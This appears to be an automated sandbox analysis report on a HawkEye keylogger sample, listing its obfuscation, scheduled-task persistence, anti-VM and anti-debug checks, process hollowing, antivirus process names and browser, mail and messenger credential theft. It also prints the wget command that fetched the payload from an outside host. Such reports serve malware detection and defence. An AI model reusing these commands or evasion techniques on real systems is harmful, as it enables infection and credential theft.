Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/UXJYzIYriAOH.cs - High entropy of concatenated method names: '.ctor', '.ctor', 'uyDZqofGJxNuQnXVKOFRBFRVQVUJTwnAkSJ', 'GIvhGLTjoGHfIgFyKQWsBYmCJPDIHTpKcrLa', 'gzeHoiQbtyCmRYBJTcRJcHbjCOVagNNXm', 'bpmlxhwvRZIDqjvWIlaKvFWJVWeafdFTI', 'wOEokzOWrXhvGtNFDIDXUClAgtxozyiJnt', 'lvojSbJxFvrWNUvtKzPdIwjdidycXTltoZ', 'QmKCwKspWHHmgBzqDiFAjFHgDZnTVhvvfL', 'lLBJBjmXBmotOtRbLmdYyLJnDetTpRCFcHwi'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/DtmJmghRepJRjNS.cs - High entropy of concatenated method names: '.ctor', 'jmOiwttsbqsBRaghzInUdqJAjBvhZeXFXvel', 'lKQkCJneWysHnpdvOzkhIBJeIFjctbeuiXC', 'ySAxwbPomrVrryIRdAgEOCFKGYhwVYTYlm', 'wxpWQOvEXnKyuUBdbypWLoBKTxoIaZbjA', 'uuqhqPnIrAimvHUKvjCyQFkqwQzERAKFX', 'RcDoOKXXmRmDVZZVaHrDrtkFqfmhCrlKzTLx', 'aKfrYnYlZGqJnrBixkYNcaUzkwmrmeRSL', 'tuXDaLHhPnrzFzjZWlucsRqsZATNWKJafVz', 'PbjIQuPLngJFJULyHqzJuoIYWKgOZiVJzZiS'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/Tester/cfSLS.cs - High entropy of concatenated method names: '.ctor', '.ctor', 'UqyixXZotxFwemAKnrfbbvpTJYlultHZab', 'TAtIRRdGNmSvPYXhQrGmgpHQjGWDGNRZJRXN', 'zXDseRDtApxZRkFwnqNXJTuAXWORtfYAuI', 'CZFWScJHuzmtpnAIDUnFqFFehmZoNvEOFX', 'xZfCfRtwnSaJkaLcQNdlIiySssQIHPJJhgrJ', 'xHzXOBheKniPhRCRvcffFQPwecsGXzQrueqP', 'TkOOKeZDrHldDdxZwHeZykKfDQinBtRfEsBt', 'DTcAYVBdeBwIBYehNuRfmxXkXcFNsyOWghi'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/JRecbvfNSTtx.cs - High entropy of concatenated method names: 'BqqcTlipHuGvbJvmKWXOLCjgvOdDlYgjRr', 'OepSWjFbaFHdyVxvKmFVDeOANCuxJpJbKxix', 'YhYznSTazUwClxAHqyAnarkkydGkJeZcwXst', 'WwKxxzmGPYyFKnkHejkEBgfsVdlkSTZvoUfN', 'wmlPtlARIyfDYviqoetAOYsalWSdQqcYFtC', 'DqIIdpKmQqsILXHxmRFbxgijWUneIPUNWQxN', 'jPTXeqUQnLjyYAHJHzsykQJZtSsUgRVpIFi', 'keFRNXqCuphsJqfLHXFQHLAJjFqsZCubKEb', 'APFQzYwPugLdjnkVfaZGwarKlfEnKqORps', 'oweGxzapGJRTdNbtWwhWEQYCiyrWKyYhr'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/CWfA.cs - High entropy of concatenated method names: 'mCtmKpVVqzoglaBaJAWBPoIVKIYUfANdADw', 'NXFUfFGpDlNQWuhPTqlIjfuIaRjPhzCRT', 'rtgaXNXRKurmBwzsltPSFucPvtLlvcXliqUQ', 'SiDkkEGrmJSgNPamndmVIRDJyWuvsAlVxKn', 'QPLixCsHvlKGnFZisNiuKgYhxibQozsGHv', 'vANkHcuRGBmxiTPsQsfFrsrEDfbAUeieBw', 'fnUGNNLJCKNWezaUcRWBcVSJbcufmtIwW', 'FHDcFDfRLPpiQCUuEShUDRhSHkRLYjKaBN', 'dWOCmniVlkzGamqYvpxBEKNoQIrIkrnllwea', 'uxrxnlmKRartbTaYLcNxEmcKcnYgKqcovHn'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/BAXyVpJquGzWGCp.cs - High entropy of concatenated method names: 'dewtyKSWfZDrUqzYgOBzBuhpTJhlaTPVTWN', 'mRZOcRfsOIrSasCPZsfXyDJmgEljIaGnywL', 'WGAXUWQttigXHSjULDSxzLaCEnKRUokZjZ', 'OnapuhBabseDxeobiuhBYORFkiOCvCHzRXe', '.ctor', 'DWcOonqjenmLWcfTXWrLQfXTGdUrVNJIG', 'xcLEaUYGtuWPSGKShQhXFQnUHLXJVzeUK', 'riNxwPZbrcilZebGjInQDwLCdDjAFKAtX', 'gJcbPtkfXJbwYSRyyefeogloOaArvexHVqlI', 'GiqbdFmlgHLcItTlXNHSbbavLXCVSEUhGc'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/Effects/vhvCnScudaJK.cs - High entropy of concatenated method names: 'hUDZPtPegJkNKjAQtSXnsYNQnSgZbVFfCWKl', 'uiHaITXlczBZqOAyGrjPIdcBGHTketejnkx', 'UAUytDxZFsInLaoALSKxKNEhjjUcIfFatdO', 'BqijaxCHyxTpyjUQarhBUikFFyNdmbbzY', '.ctor', 'IqXpbZSuWtqDEuFfeHOlEtxPhUVaERuCFG', 'chebPveURZsDZjYlmzwzKETsLHCQEBBtBD'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/SsrXqWqckQCrvj.cs - High entropy of concatenated method names: 'iOlHdQhTAckufgLtRppNFsyRTRTRAuOpl', 'ntQBshxAxOozJPaiITngKwXEGaIXSLTSiDG', 'rQpXQvpBpwUnNWtcdrXwGWdYmTIlYTvFQhGt', 'WddkqzCksggJbQVPBlIWfRcXFHkTRLBPSqL', 'hHZyUSGiUfHBHjEpekDljRybUVLxldVlp', 'sYVCdVKrHenpXpmNJldowLAAcbOLzGxhv', '.ctor', 'QZApokZdmFgBOqIoDuRGzRWKfSlpriSZmBf'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/UXJYzIYriAOH.cs - High entropy of concatenated method names: '.ctor', '.ctor', 'uyDZqofGJxNuQnXVKOFRBFRVQVUJTwnAkSJ', 'GIvhGLTjoGHfIgFyKQWsBYmCJPDIHTpKcrLa', 'gzeHoiQbtyCmRYBJTcRJcHbjCOVagNNXm', 'bpmlxhwvRZIDqjvWIlaKvFWJVWeafdFTI', 'wOEokzOWrXhvGtNFDIDXUClAgtxozyiJnt', 'lvojSbJxFvrWNUvtKzPdIwjdidycXTltoZ', 'QmKCwKspWHHmgBzqDiFAjFHgDZnTVhvvfL', 'lLBJBjmXBmotOtRbLmdYyLJnDetTpRCFcHwi'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/DtmJmghRepJRjNS.cs - High entropy of concatenated method names: '.ctor', 'jmOiwttsbqsBRaghzInUdqJAjBvhZeXFXvel', 'lKQkCJneWysHnpdvOzkhIBJeIFjctbeuiXC', 'ySAxwbPomrVrryIRdAgEOCFKGYhwVYTYlm', 'wxpWQOvEXnKyuUBdbypWLoBKTxoIaZbjA', 'uuqhqPnIrAimvHUKvjCyQFkqwQzERAKFX', 'RcDoOKXXmRmDVZZVaHrDrtkFqfmhCrlKzTLx', 'aKfrYnYlZGqJnrBixkYNcaUzkwmrmeRSL', 'tuXDaLHhPnrzFzjZWlucsRqsZATNWKJafVz', 'PbjIQuPLngJFJULyHqzJuoIYWKgOZiVJzZiS'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/VfG.cs - High entropy of concatenated method names: 'ilHNbxekpbZzUXAGaNbmXJXjbjJvaOdUTm', 'XRbcCfJitFSNScjYuZsVghvmWuETiQsfFi', 'epIDDuRbTcyRWkcIaTuVLHAsqEEnsRcpg', 'jKwgQEjCtWunEBZJyVzqzCdbvDpRtdwqCgs', 'oZxYEKFlSJJQuEfDxvDfjaluBZPhRXvuxVFz', 'HZHmZOtpVDbpoKfalkAVWfUOonGHxAuoG', 'cmuSIsFedHKWdijcZfGdUgxhXDRyBrJztcfI', 'leooCrCBwxfnCBDKlVRuyJJZUOroNnbHZIeK', '.ctor', 'uEQsgQfNDNEVvTfXXDDIqFOEjzWnrKqbjB'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/dUGNSEqE.cs - High entropy of concatenated method names: 'OXhzvPIABrXbcyVvicyRZSYurCktHiINxZV', 'ockpwrLEjmnEKHJbelrGCgpjQkEZJxXeWi', 'ktwZdqOPmNSXRcwPwJUHgEGSBESoKgXuGf', 'AbuZFGWzNwbzeijGdirGlFhhXPgQKarTu', 'fRmTJeeDeNXVoHBtQwQFVKfSvDstydQnaQw', 'jpOOHojEixDcDoBhdlGHcjForJVIHbvDUG', '.ctor', 'qFBQtbZUopyavnAzeQLojkCpInkSDcBEc', 'iKQUOKFLTyiZDsWFtJoLInzFLyxOLQhKidJ', 'RmhVNLaSAQInSFRbtNtGhSmxJLzJbouwq'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/wyCYmZnQYaRwVkKC.cs - High entropy of concatenated method names: '.ctor', 'JFoDjtSuqKLyZZsHdOpbQZysPvNVeGGYSgB', 'WGcNWBAiLSRoiPkrtZzsVICeLyFrsefzY', 'JOUmGDdmyfJfAAAAlewLKzuvpIXHnaEdqkdx', 'dZcpcvCTfQkmkWwELGibEahiJcqXATdzbjnb', 'OhxnCpqlspGKeRgkNcwZOfBwqrECwkSqewU', 'kmbNxYmxjzbLYrjZbFGqVbCekhpvdGlWU'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/yhsvcD.cs - High entropy of concatenated method names: 'vgiqbpdsZZSRjijojrDZvTzVcFFxbsIkNZ', 'AoFkEdiPzhsREvNOuQILtKXaTPcKDOsxTcco', 'atAJajxGtiOyGLfESKJgVArJBuwJgiqoulIJ', 'nDntvBRtAnUEXJdIObGnqZLthRQVuQNvsvr', 'kmOEoHTZxFLbYVamajnFfgXYJkeGlRKIrr', 'GwjLrYntBNBmQwZqhubOYrReSHFHQHCax', 'hXUjHwZlgAaxvAvfidKORirFyBKSJBLTz', 'vFIcxNDXiWaNNyvSXowNYTiKLaKooWhJTqq', 'dyDcYKFyKxqXHJYDJYHEaiRDYslzNymVrcG', 'ZLoQNttqDoYmqNfokBgWtWNHxnzuDXeJzeA'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/CWfA.cs - High entropy of concatenated method names: 'mCtmKpVVqzoglaBaJAWBPoIVKIYUfANdADw', 'NXFUfFGpDlNQWuhPTqlIjfuIaRjPhzCRT', 'rtgaXNXRKurmBwzsltPSFucPvtLlvcXliqUQ', 'SiDkkEGrmJSgNPamndmVIRDJyWuvsAlVxKn', 'QPLixCsHvlKGnFZisNiuKgYhxibQozsGHv', 'vANkHcuRGBmxiTPsQsfFrsrEDfbAUeieBw', 'fnUGNNLJCKNWezaUcRWBcVSJbcufmtIwW', 'FHDcFDfRLPpiQCUuEShUDRhSHkRLYjKaBN', 'dWOCmniVlkzGamqYvpxBEKNoQIrIkrnllwea', 'uxrxnlmKRartbTaYLcNxEmcKcnYgKqcovHn'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/Tester/cfSLS.cs - High entropy of concatenated method names: '.ctor', '.ctor', 'UqyixXZotxFwemAKnrfbbvpTJYlultHZab', 'TAtIRRdGNmSvPYXhQrGmgpHQjGWDGNRZJRXN', 'zXDseRDtApxZRkFwnqNXJTuAXWORtfYAuI', 'CZFWScJHuzmtpnAIDUnFqFFehmZoNvEOFX', 'xZfCfRtwnSaJkaLcQNdlIiySssQIHPJJhgrJ', 'xHzXOBheKniPhRCRvcffFQPwecsGXzQrueqP', 'TkOOKeZDrHldDdxZwHeZykKfDQinBtRfEsBt', 'DTcAYVBdeBwIBYehNuRfmxXkXcFNsyOWghi'
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/JRecbvfNSTtx.cs - High entropy of concatenated method names: 'BqqcTlipHuGvbJvmKWXOLCjgvOdDlYgjRr', 'OepSWjFbaFHdyVxvKmFVDeOANCuxJpJbKxix', 'YhYznSTazUwClxAHqyAnarkkydGkJeZcwXst', 'WwKxxzmGPYyFKnkHejkEBgfsVdlkSTZvoUfN', 'wmlPtlARIyfDYviqoetAOYsalWSdQqcYFtC', 'DqIIdpKmQqsILXHxmRFbxgijWUneIPUNWQxN', 'jPTXeqUQnLjyYAHJHzsykQJZtSsUgRVpIFi', 'keFRNXqCuphsJqfLHXFQHLAJjFqsZCubKEb', 'APFQzYwPugLdjnkVfaZGwarKlfEnKqORps', 'oweGxzapGJRTdNbtWwhWEQYCiyrWKyYhr'

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\SysWOW64\wget.exe - File created: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe - File created: C:\Users\user\AppData\Roaming\TPykFAdhwNOvb.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown - Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TPykFAdhwNOvb' /XML 'C:\Users\user\AppData\Local\Temp\tmpC925.tmp'

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe - Code function: 8_2_00403BC7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_00403BC7
Disables application error messages (SetErrorMode)
Source: C:\Windows\SysWOW64\cmd.exe - Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe - Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe - Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe - Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match - File source: 00000004.00000002.1973879650.0000000003FF0000.00000004.00000001.sdmp, type: MEMORY
Yara detected Cassandra Crypter
Source: Yara match - File source: 00000004.00000002.1973693827.0000000002FF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match - File source: 00000004.00000002.1973804512.0000000003035000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match - File source: 00000004.00000002.1979138180.0000000006090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match - File source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 1516, type: MEMORY
Source: Yara match - File source: 4.2.qaxCr0UKyI0yfkE.exe.6090000.5.raw.unpack, type: UNPACKEDPE
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe - WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT MacAddress FROM Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp - Binary or memory string: SBIEDLL.DLL
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp - Binary or memory string: WIRESHARK.EXE
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe - Code function: 8_2_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification,8_2_0040A5A9
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe - Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe TID: 3444 - Thread sleep time: -53726s >= -30000s
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe TID: 2172 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe TID: 2564 - Thread sleep count: 182 > 30
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe TID: 2564 - Thread sleep time: -182000s >= -30000s
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe TID: 4400 - Thread sleep count: 166 > 30
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe TID: 4400 - Thread sleep time: -166000s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe - WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe - Last function: Thread delayed
Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe - Code function: 8_2_0040A1A7 FindFirstFileW,FindNextFileW,8_2_0040A1A7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe - Code function: 12_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,12_2_0040702D
Contains functionality to query system information
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe - Code function: 8_2_00418A6B memset,GetSystemInfo,8_2_00418A6B
Queries a list of all running processes
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe - Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe - Code function: 8_2_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification,8_2_0040A5A9
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe - Code function: 8_2_004449B3 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_004449B3
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe - Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u202d????????????????????????????????????????.cs | Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe | Memory written: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe base: 400000 value starts with: 4D5A
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe'
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TPykFAdhwNOvb' /XML 'C:\Users\user\AppData\Local\Temp\tmpC925.tmp'
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe | Process created: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpD3D3.tmp'
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpC597.tmp'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe'
May try to detect the Windows Explorer process (often used for injection)
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2382192205.0000000001B50000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2382192205.0000000001B50000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2382192205.0000000001B50000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2382192205.0000000001B50000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc.) of a device
Source: C:\Windows\SysWOW64\wget.exe | Queries volume information: C:\Users\user\Desktop\download VolumeInformation
Contains functionality to query local / system time
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00418906 GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy
Contains functionality to query the account / user name
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe | Code function: 4_2_00D2BCC2 GetUserNameW
Contains functionality to query Windows version
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00409218 GetVersionExW
Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | Binary or memory string: bdagent.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | Binary or memory string: MSASCui.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | Binary or memory string: avguard.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | Binary or memory string: avgrsx.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | Binary or memory string: avcenter.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | Binary or memory string: avp.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | Binary or memory string: zlclient.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | Binary or memory string: wireshark.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | Binary or memory string: avgcsrvx.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | Binary or memory string: avgnt.exe
Source: qaxCr0UKyI0yfkE.exe, 00000004.00000002.1971366862.0000000000F6C000.00000004.00000020.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | Binary or memory string: hijackthis.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | Binary or memory string: avgui.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | Binary or memory string: avgwdsvc.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | Binary or memory string: mbam.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | Binary or memory string: MsMpEng.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmp | Binary or memory string: ComboFix.exe
Checks if an Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Stealing of Sensitive Information:

Yara detected HawkEye Keylogger
Source: Yara match | File source: 00000007.00000002.2380483306.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1975285667.0000000004308000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2383322507.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1973879650.0000000003FF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 1516, type: MEMORY
Source: Yara match | File source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 4296, type: MEMORY
Source: Yara match | File source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc.)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Tries to steal Mail credentials (via file access)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
